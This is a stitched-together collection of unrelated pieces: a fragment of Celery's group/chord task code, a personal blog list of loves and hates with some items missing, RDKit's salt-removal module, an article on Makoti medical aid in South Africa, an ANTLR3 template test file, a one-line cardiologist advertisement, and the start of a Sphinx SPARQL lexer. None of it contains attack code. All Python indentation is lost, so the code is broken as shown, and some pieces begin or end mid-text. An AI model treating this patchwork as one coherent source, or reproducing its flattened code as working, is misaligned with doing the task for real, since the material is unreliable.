CallableSignature=abstract.CallableSignature,
from_dict=Signature.from_dict,
isinstance=isinstance, tuple=tuple):
for task in tasks:
if isinstance(task, CallableSignature):
# local sigs are always of type Signature, and we
# clone them to make sure we don't modify the originals.
task = task.clone()
else:
# serialized sigs must be converted to Signature.
task = from_dict(task, app=app)
if isinstance(task, group):
# needs yield_from :(
unroll = task._prepared(
task.tasks, partial_args, group_id, root_id, app,
)
for taskN, resN in unroll:
yield taskN, resN
else:
if partial_args and not task.immutable:
task.args = tuple(partial_args) + tuple(task.args)
yield task, task.freeze(group_id=group_id, root_id=root_id)
def _apply_tasks(self, tasks, producer=None, app=None, p=None,
add_to_parent=None, chord=None,
args=None, kwargs=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
with app.producer_or_acquire(producer) as producer:
for sig, res in tasks:
sig.apply_async(producer=producer, add_to_parent=False,
chord=sig.options.get('chord') or chord,
args=args, kwargs=kwargs,
**options)
# adding callback to result, such that it will gradually
# fulfill the barrier.
#
# Using barrier.add would use result.then, but we need
# to add the weak argument here to only create a weak
# reference to the object.
if p and not p.cancelled and not p.ready:
p.size += 1
res.then(p, weak=True)
yield res # <-- r.parent, etc set in the frozen result.
def _freeze_gid(self, options):
# remove task_id and use that as the group_id,
# if we don't remove it then every task will have the same id...
options = dict(self.options, **options)
options['group_id'] = group_id = (
options.pop('task_id', uuid()))
return options, group_id, options.get('root_id')
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
gid = opts['task_id']
except KeyError:
gid = opts['task_id'] = uuid()
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
new_tasks = []
# Need to unroll subgroups early so that chord gets the
# right result instance for chord_unlock etc.
results = list(self._freeze_unroll(
new_tasks, group_id, chord, root_id, parent_id,
))
if isinstance(self.tasks, MutableSequence):
self.tasks[:] = new_tasks
else:
self.tasks = new_tasks
return self.app.GroupResult(gid, results)
_freeze = freeze
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
stack = deque(self.tasks)
while stack:
task = maybe_signature(stack.popleft(), app=self._app).clone()
if isinstance(task, group):
stack.extendleft(task.tasks)
else:
new_tasks.append(task)
yield task.freeze(group_id=group_id,
chord=chord, root_id=root_id,
parent_id=parent_id)
def __repr__(self):
if self.tasks:
return remove_repeating_from_task(
self.tasks[0]['task'],
'group({0.tasks!r})'.format(self))
return 'group(<empty>)'
def __len__(self):
return len(self.tasks)
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0].app
except LookupError:
pass
return app if app is not None else current_app
@Signature.register_type()
@python_2_unicode_compatible
class chord(Signature):
r"""Barrier synchronization primitive.
A chord consists of a header and a body.
The header is a group of tasks that must complete before the callback is
called. A chord is essentially a callback for a group of tasks.
The body is applied with the return values of all the header
tasks as a list.
Example:
The chord:
.. code-block:: pycon
>>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s())
is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`:
.. code-block:: pycon
>>> res.get()
12
"""
@classmethod
def from_dict(cls, d, app=None):
args, d['kwargs'] = cls._unpack_args(**d['kwargs'])
return _upgrade(d, cls(*args, app=app, **d))
@staticmethod
def _unpack_args(header=None, body=None, **kwargs):
# Python signatures are better at extracting keys from dicts
# than manually popping things off.
return (header, body), kwargs
def __init__(self, header, body=None, task='celery.chord',
args=(), kwargs={}, app=None, **options):
Signature.__init__(
self, task, args,
dict(kwargs=kwargs, header=_maybe_group(header, app),
body=maybe_signature(body, app=app)), app=app, **options
)
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
return self.apply_async((), {'body': body} if body else {}, **options)
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
if not isinstance(self.tasks, group):
self.tasks = group(self.tasks, app=self.app)
header_result = self.tasks.freeze(
parent_id=parent_id, root_id=root_id, chord=self.body)
bodyres = self.body.freeze(_id, root_id=root_id)
# we need to link the body result back to the group result,
# but the body may actually be a chain,
# so find the first result without a parent
node = bodyres
seen = set()
while node:
if node.id in seen:
raise RuntimeError('Recursive result parents')
seen.add(node.id)
if node.parent is None:
node.parent = header_result
break
node = node.parent
self.id = self.tasks.id
return bodyres
def apply_async(self, args=(), kwargs={}, task_id=None,
producer=None, publisher=None, connection=None,
router=None, result_cls=None, **options):
kwargs = kwargs or {}
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
body = kwargs.pop('body', None) or self.kwargs['body']
kwargs = dict(self.kwargs['kwargs'], **kwargs)
body = body.clone(**options)
app = self._get_app(body)
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=app))
if app.conf.task_always_eager:
return self.apply(args, kwargs,
body=body, task_id=task_id, **options)
if len(self.tasks) == 1:
# chord([A], B) can be optimized as A | B
# - Issue #3323
return (self.tasks[0] | body).set(task_id=task_id).apply_async(
args, kwargs, **options)
# chord([A, B, ...], C)
return self.run(tasks, body, args, task_id=task_id, **options)
def apply(self, args=(), kwargs={}, propagate=True, body=None, **options):
body = self.body if body is None else body
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=self.app))
return body.apply(
args=(tasks.apply(args, kwargs).get(propagate=propagate),),
)
def _traverse_tasks(self, tasks, value=None):
stack = deque(list(tasks))
while stack:
task = stack.popleft()
if isinstance(task, group):
stack.extend(task.tasks)
else:
yield task if value is None else value
def __length_hint__(self):
return sum(self._traverse_tasks(self.tasks, 1))
def run(self, header, body, partial_args, app=None, interval=None,
countdown=1, max_retries=None, eager=False,
task_id=None, **options):
app = app or self._get_app(body)
group_id = header.options.get('task_id') or uuid()
root_id = body.options.get('root_id')
body.chord_size = self.__length_hint__()
options = dict(self.options, **options) if options else self.options
if options:
options.pop('task_id', None)
body.options.update(options)
results = header.freeze(
group_id=group_id, chord=body, root_id=root_id).results
bodyres = body.freeze(task_id, root_id=root_id)
parent = app.backend.apply_chord(
header, partial_args, group_id, body,
interval=interval, countdown=countdown,
options=options, max_retries=max_retries,
result=results)
bodyres.parent = parent
return bodyres
def clone(self, *args, **kwargs):
s = Signature.clone(self, *args, **kwargs)
# need to make copy of body
try:
s.kwargs['body'] = maybe_signature(s.kwargs['body'], clone=True)
except (AttributeError, KeyError):
pass
return s
def link(self, callback):
self.body.link(callback)
return callback
def link_error(self, errback):
self.body.link_error(errback)
return errback
def set_immutable(self, immutable):
# changes mutability of header only, not callback.
for task in self.tasks:
task.set_immutable(immutable)
def __repr__(self):
if self.body:
if isinstance(self.body, _chain):
return remove_repeating_from_task(
self.body.tasks[0]['task'],
'%({0} | {1!r})'.format(
self.body.tasks[0].reprcall(self.tasks),
chain(self.body.tasks[1:], app=self._app),
),
)
return '%' + remove_repeating_from_task(
self.body['task'], self.body.reprcall(self.tasks))
return '<chord without body: {0.tasks!r}>'.format(self)
@cached_property
def app(self):
return self._get_app(self.body)
def _get_app(self, body=None):
app = self._app
if app is None:
try:
tasks = self.tasks.tasks # is a group
except AttributeError:
tasks = self.tasks
app = tasks[0]._app
if app is None and body is not None:
app = body._app
return app if app is not None else current_app
tasks = getitem_property('kwargs.header', 'Tasks in chord header.')
body = getitem_property('kwargs.body', 'Body task of chord.')
def signature(varies, *args, **kwargs):
"""Create new signature.
- if the first argument is a signature already then it's cloned.
- if the first argument is a dict, then a Signature version is returned.
Returns:
Signature: The resulting signature.
"""
app = kwargs.get('app')
if isinstance(varies, dict):
if isinstance(varies, abstract.CallableSignature):
return varies.clone()
return Signature.from_dict(varies, app=app)
return Signature(varies, *args, **kwargs)
subtask = signature # noqa: E305 XXX compat
def maybe_signature(d, app=None, clone=False):
"""Ensure obj is a signature, or None.
Arguments:
d (Optional[Union[abstract.CallableSignature, Mapping]]):
Signature or dict-serialized signature.
app (celery.Celery):
App to bind signature to.
clone (bool):
If d' is already a signature, the signature
will be cloned when this flag is enabled.
Returns:
Optional[abstract.CallableSignature]
"""
if d is not None:
if isinstance(d, abstract.CallableSignature):
if clone:
d = d.clone()
elif isinstance(d, dict):
d = signature(d)
if app is not None:
d._app = app
return d
maybe_subtask = maybe_signature # noqa: E305 XXX compat
|
As the latest round of challenges in the blogging community, I have been nominated by Tonya from fourth generation farmgirl. Please take time to visit her fantastic blog, the photos are amazing and I always enjoy seeing how someone lives in a completely different environment than mine.
This challenge consists of listing ten things that I love and ten things that I hate, and nominating others to do the same.
2. Travel – anywhere, any place.
3. My doglets – my preciouses.
4. My work – I’m not kidding, I’m lucky to have a career that I love!
5. Hanging out at home – complete contrast to #2, but when I’m not travelling, I’m a real homebody.
6. Summer = warmth, sunshine and salads.
7. Disney – its my happy place – theme parks, resorts, cruise line… not so much the movies.
8. Laughing – I can see humour in practically any situation.
9. Socks – you can never have too many.
10. The Internet – it’s where I live my life. From paying bills online to communicating with friends, when I don’t have access, its like having a missing limb.
1. Poverty – so many live in grinding poverty around the world, when immense wealth is in the hands of other who have more than they need.
2. Winter – I live too far south, I seriously need to move to somewhere warmer. Or escape for the winter, one or the other.
4. Sexism & racism – to think anyone is less than equal to another due to the colour of their skin or their physical parts is completely inappropriate.
5. Cruelty to animals – anyone that mistreats an animal deserves the same to be done to them, likewise anyone that abuses a child.
6. Morons – not those with an intellectual disability, but those who don’t use their brains.
7. Those who don’t take responsiblity for their own actions – if you are an adult, you have no one to blame for your choices and behaviours other than yourself.
8. Environment apathy – I don’t give a rat’s arse if you “believe” in “global warming” or not. But you cannot argue with the fact that humans are pillaging, polluting and overpopulating the planet.
9. Religous nutters – Westboro Baptist Church, ISIS – anyone that kills or incites violence in the name of religion really needs to go back to basics.
10. The media – between lack of investigative journalism, articles that appear to have been written by poorly trained monkeys, compounded with the need to blow things out of proportion and focus on the negative or petty… I won’t read it or watch it.
|
#
# Copyright (c) 2010, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Greg Landrum, Dec 2006
#
import os
import re
from collections import namedtuple
from contextlib import closing
from rdkit import Chem, RDConfig
from rdkit.Chem.rdmolfiles import SDMolSupplier, SmilesMolSupplier
class InputFormat:
SMARTS = 'smarts'
MOL = 'mol'
SMILES = 'smiles'
def _smartsFromSmartsLine(line):
"""
Converts given line into a molecule using 'Chem.MolFromSmarts'.
"""
# Name the regular expression (better than inlining it)
whitespace = re.compile(r'[\t ]+')
# Reflects the specialisation of this method to read the rather unusual
# SMARTS files with the // comments.
line = line.strip().split('//')[0]
if line:
smarts = whitespace.split(line)
salt = Chem.MolFromSmarts(smarts[0])
if salt is None:
raise ValueError(line)
return salt
def _getSmartsSaltsFromStream(stream):
"""
Yields extracted SMARTS salts from given stream.
"""
with closing(stream) as lines:
for line in lines:
smarts = _smartsFromSmartsLine(line)
if smarts:
yield smarts
def _getSmartsSaltsFromFile(filename):
"""
Extracts SMARTS salts from given file object.
"""
return _getSmartsSaltsFromStream(open(filename, 'r'))
class SaltRemover(object):
defnFilename = os.path.join(RDConfig.RDDataDir, 'Salts.txt')
def __init__(self, defnFilename=None, defnData=None, defnFormat=InputFormat.SMARTS):
if defnFilename:
self.defnFilename = defnFilename
self.defnData = defnData
self.salts = None
self.defnFormat = defnFormat
self._initPatterns()
def _initPatterns(self):
"""
>>> remover = SaltRemover()
>>> len(remover.salts)>0
True
Default input format is SMARTS
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> remover = SaltRemover(defnData="[Na+]\\nCC(=O)O", defnFormat=InputFormat.SMILES)
>>> len(remover.salts)
2
>>> from rdkit import RDLogger
>>> RDLogger.DisableLog('rdApp.error')
>>> remover = SaltRemover(defnData="[Cl,fail]")
Traceback (most recent call last):
...
ValueError: [Cl,fail]
>>> RDLogger.EnableLog('rdApp.error')
"""
if self.defnData:
from rdkit.six.moves import cStringIO as StringIO
inF = StringIO(self.defnData)
with closing(inF):
self.salts = []
for line in inF:
if line:
if self.defnFormat == InputFormat.SMARTS:
salt = _smartsFromSmartsLine(line)
elif self.defnFormat == InputFormat.SMILES:
salt = Chem.MolFromSmiles(line)
else:
raise ValueError('Unsupported format for supplier.')
if salt is None:
raise ValueError(line)
self.salts.append(salt)
else:
if self.defnFormat == InputFormat.SMARTS:
self.salts = [mol for mol in _getSmartsSaltsFromFile(self.defnFilename)]
elif self.defnFormat == InputFormat.MOL:
self.salts = [mol for mol in SDMolSupplier(self.defnFilename)]
elif self.defnFormat == InputFormat.SMILES:
self.salts = [mol for mol in SmilesMolSupplier(self.defnFilename)]
else:
raise ValueError('Unsupported format for supplier.')
def StripMol(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover.StripMol(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
Notice that all salts are removed:
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl.Br')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Matching (e.g. "salt-like") atoms in the molecule are unchanged:
>>> mol = Chem.MolFromSmiles('CN(Br)Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
>>> mol = Chem.MolFromSmiles('CN(Br)Cl.Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Charged salts are handled reasonably:
>>> mol = Chem.MolFromSmiles('C[NH+](C)(C).[Cl-]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Watch out for this case (everything removed):
>>> remover = SaltRemover()
>>> len(remover.salts)>1
True
>>> mol = Chem.MolFromSmiles('CC(=O)O.[Na]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
0
dontRemoveEverything helps with this by leaving the last salt:
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
4
but in cases where the last salts are the same, it can't choose
between them, so it returns all of them:
>>> mol = Chem.MolFromSmiles('Cl.Cl')
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
2
"""
strippedMol = self._StripMol(mol, dontRemoveEverything)
return strippedMol.mol
def StripMolWithDeleted(self, mol, dontRemoveEverything=False):
"""
Strips given molecule and returns it, with the fragments which have been deleted.
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Br')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> Chem.MolToSmiles(res)
'CN(C)C'
>>> [Chem.MolToSmarts(m) for m in deleted]
['[Cl,Br]']
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> res.GetNumAtoms()
4
>>> len(deleted)
1
>>> deleted[0].GetNumAtoms()
1
>>> Chem.MolToSmiles(deleted[0])
'Cl'
Multiple occurrences of 'Cl' and without tuple destructuring
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl')
>>> tup = remover.StripMolWithDeleted(mol)
>>> tup.mol.GetNumAtoms()
4
>>> len(tup.deleted)
1
>>> tup.deleted[0].GetNumAtoms()
1
>>> Chem.MolToSmiles(deleted[0])
'Cl'
"""
return self._StripMol(mol, dontRemoveEverything)
def _StripMol(self, mol, dontRemoveEverything=False):
def _applyPattern(m, salt, notEverything):
nAts = m.GetNumAtoms()
if not nAts:
return m
res = m
t = Chem.DeleteSubstructs(res, salt, True)
if not t or (notEverything and t.GetNumAtoms() == 0):
return res
res = t
while res.GetNumAtoms() and nAts > res.GetNumAtoms():
nAts = res.GetNumAtoms()
t = Chem.DeleteSubstructs(res, salt, True)
if notEverything and t.GetNumAtoms() == 0:
break
res = t
return res
StrippedMol = namedtuple('StrippedMol', ['mol', 'deleted'])
deleted = []
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
return StrippedMol(mol, deleted)
modified = False
natoms = mol.GetNumAtoms()
for salt in self.salts:
mol = _applyPattern(mol, salt, dontRemoveEverything)
if natoms != mol.GetNumAtoms():
natoms = mol.GetNumAtoms()
modified = True
deleted.append(salt)
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
break
if modified and mol.GetNumAtoms() > 0:
Chem.SanitizeMol(mol)
return StrippedMol(mol, deleted)
def __call__(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> Chem.MolToSmiles(remover.salts[0])
'Cl'
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
"""
return self.StripMol(mol, dontRemoveEverything=dontRemoveEverything)
# ------------------------------------
#
# doctest boilerplate
#
def _runDoctests(verbose=None): # pragma: nocover
import sys
import doctest
failed, _ = doctest.testmod(optionflags=doctest.ELLIPSIS, verbose=verbose)
sys.exit(failed)
if __name__ == '__main__': # pragma: nocover
_runDoctests()
|
The Makoti medical aid aims to provide top medical cover at reasonable rates.
Members of the Makoti medical scheme select a doctor as their GP. Makoti will pay the costs for this doctor’s services to the member and dependants. Unless it is an emergency, the member and his dependants can then only use this GP, which the Makoti medical aid believes is beneficial to improved health care.According to Makoti medical aid, these include the trust relationship that develops between doctor and patient, and the doctor getting to fully know the member’s health status and medical requirements.
What is Makoti medical aid?
Makoti medical aid offers two benefit options. The Makoti medical aid Primary Option covers unlimited primary health care from your chosen general practitioner. The option also covers acute and chronic medication, basic pathology and radiology. In addition, it covers ambulance services for medical emergencies, optometry and primary care dentistry benefits, and statutory prescribed minimum benefits.
The Makoti medical aid Comprehensive Option includes unlimited primary health care from the chosen general practitioner. It also includes cover for acute and chronic mediation, hospitalisation including step down care, specialist services, pathology and radiology. Also it covers ambulance services for medical emergencies and statutory prescribed minimum benefits.
Optometry, dentistry and other services are provided by accredited Makoti medical aid providers.
Makoti medical aid is an open scheme, which means that members of the public can join it.
There are many medical aids in South Africa –Discovery medical aid, Makoti medical aid scheme, Momentum Health and Oxygen medical aid to mention just a few. When comparing all medical aids available to you, be critical! And you should consider the benefits a medical aid such as Makoti medical aid offers you.
For example, what is the extent of the medical cover, what are the limits on medical expenses, what are the conditions for claiming and, especially if you are older, what are the chronic benefits. Don’t be distracted by nice to haves. Instead make sure the medical aid you choose is the best medical aid both for your individual needs. And it should cover the health at of your dependants. Be sure to request medical aid quotes from different medical aids. That ensures you find the most affordable scheme for your needs.
Makoti medical aid is an accredited scheme with the Council for Medical Schemes. The Council supervises the medical aid industry on behalf of the South African government. The extensive and very vital industry overseen by the Council for Medical Schemes has around 100 closed and open schemes, of which Makoti medical aid is one. The Council for Medical Schemes strives to ensure that the medical aid industry provides fair and equal access and services to the public. It achieves this by publishing information on all the medical aid schemes so that the public is fully informed of the benefits of the schemes, their obligations to the scheme, etc.
The Council for Medical Aid Schemes also operates as a type of ombudsman for the industry to ensure that complaints from members of medical schemes are addressed appropriately. It also provides a range of other services such as ensuring compliance with South Africa’s Medical Schemes Act, acting as an advisory body to South Africa’s Minister of Health and facilitating ongoing improvement to medical aid schemes and the way they operate.
|
import unittest
import textwrap
import antlr3
import antlr3.tree
import stringtemplate3
import testbase
import sys
import os
from StringIO import StringIO
class T(testbase.ANTLRTest):
def execParser(self, grammar, grammarEntry, input, group=None):
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = parserCls(tStream)
if group is not None:
parser.templateLib = group
result = getattr(parser, grammarEntry)()
if result.st is not None:
return result.st.toString()
return None
def testInlineTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testExternalTemplate(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T2;
options {
language=Python;
output=template;
}
a : r+=arg OP r+=arg
-> expr(op={$OP.text}, args={$r})
;
arg: ID -> template(t={$ID.text}) "<t>";
ID : 'a'..'z'+;
OP: '+';
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"a + b",
group
)
self.failUnlessEqual("[a+b]", found)
def testEmptyTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
->
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnless(found is None)
def testList(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: (r+=b)* EOF
-> template(r={$r})
"<r; separator=\",\">"
;
b: ID
-> template(t={$ID.text}) "<t>"
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc def ghi"
)
self.failUnlessEqual("abc,def,ghi", found)
def testAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
-> { stringtemplate3.StringTemplate("hello") }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{ $st = %{"hello"} }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction2(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
res = %{"hello <foo>"}
%res.foo = "world";
}
-> { res }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello world", found)
def testIndirectTemplateConstructor(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
$st = %({"expr"})(args={[1, 2, 3]}, op={"+"})
}
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc",
group
)
self.failUnlessEqual("[1+2+3]", found)
def testPredicates(self):
grammar = textwrap.dedent(
r'''grammar T3;
options {
language=Python;
output=template;
}
a : ID INT
-> {$ID.text=='a'}? template(int={$INT.text})
"A: <int>"
-> {$ID.text=='b'}? template(int={$INT.text})
"B: <int>"
-> template(int={$INT.text})
"C: <int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"b 34"
)
self.failUnlessEqual("B: 34", found)
def testBacktrackingMode(self):
grammar = textwrap.dedent(
r'''grammar T4;
options {
language=Python;
output=template;
backtrack=true;
}
a : (ID INT)=> ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testRewrite(self):
grammar = textwrap.dedent(
r'''grammar T5;
options {
language=Python;
output=template;
rewrite=true;
}
prog: stat+;
stat
: 'if' '(' expr ')' stat
| 'return' return_expr ';'
| '{' stat* '}'
| ID '=' expr ';'
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
result = parser.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
def testTreeRewrite(self):
grammar = textwrap.dedent(
r'''grammar T6;
options {
language=Python;
output=AST;
}
tokens {
BLOCK;
ASSIGN;
}
prog: stat+;
stat
: IF '(' e=expr ')' s=stat
-> ^(IF $e $s)
| RETURN expr ';'
-> ^(RETURN expr)
| '{' stat* '}'
-> ^(BLOCK stat*)
| ID '=' expr ';'
-> ^(ASSIGN ID expr)
;
expr
: ID
| INT
;
IF: 'if';
RETURN: 'return';
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
treeGrammar = textwrap.dedent(
r'''tree grammar T6Walker;
options {
language=Python;
tokenVocab=T6;
ASTLabelType=CommonTree;
output=template;
rewrite=true;
}
prog: stat+;
stat
: ^(IF expr stat)
| ^(RETURN return_expr)
| ^(BLOCK stat*)
| ^(ASSIGN ID expr)
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
walkerCls = self.compileInlineGrammar(treeGrammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
tree = parser.prog().tree
nodes = antlr3.tree.CommonTreeNodeStream(tree)
nodes.setTokenStream(tStream)
walker = walkerCls(nodes)
walker.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
if __name__ == '__main__':
unittest.main()
|
Handpicked Top 3 Cardiologists in Kansas City, Missouri. They face a rigorous 50-Point Inspection, which includes customer reviews, history, complaints, ratings, satisfaction, trust, cost and general excellence. You deserve the best!
|
# -*- coding: utf-8 -*-
"""
sparqllexer
~~~~~~~~~~~
Extension to add a sparql lexer to Sphinx.
``http://sphinx.pocoo.org/ext/appapi.html?highlight=pygments#sphinx.application.Sphinx.add%5Flexer``
It uses the Kier Davis code: ``https://github.com/kierdavis/SparqlLexer``.
.. code-block:: sparql
Sparql example TODO
changelog
`````````
2013-21-21: pchampin: added incomplete support for functions
2012-11-27: pchampin: improved a number of token definition
"""
from pygments.lexer import RegexLexer, bygroups
from pygments.formatter import Formatter
from pygments.token import *
PREFIX = r"[a-zA-Z][-_a-zA-Z0-9]*"
NAME = r"[_a-zA-Z][-_a-zA-Z0-9]*"
class SparqlLexer(RegexLexer):
name = "Sparql"
aliases = ["sparql", "ttl"]
filenames = ["*.ttl"]
alias_filenames = ["*.txt"]
mimetypes = ["text/x-sparql", "text/sparql", "application/sparql"]
tokens = {
"root": [
(r"#.*\n", Comment.Single),
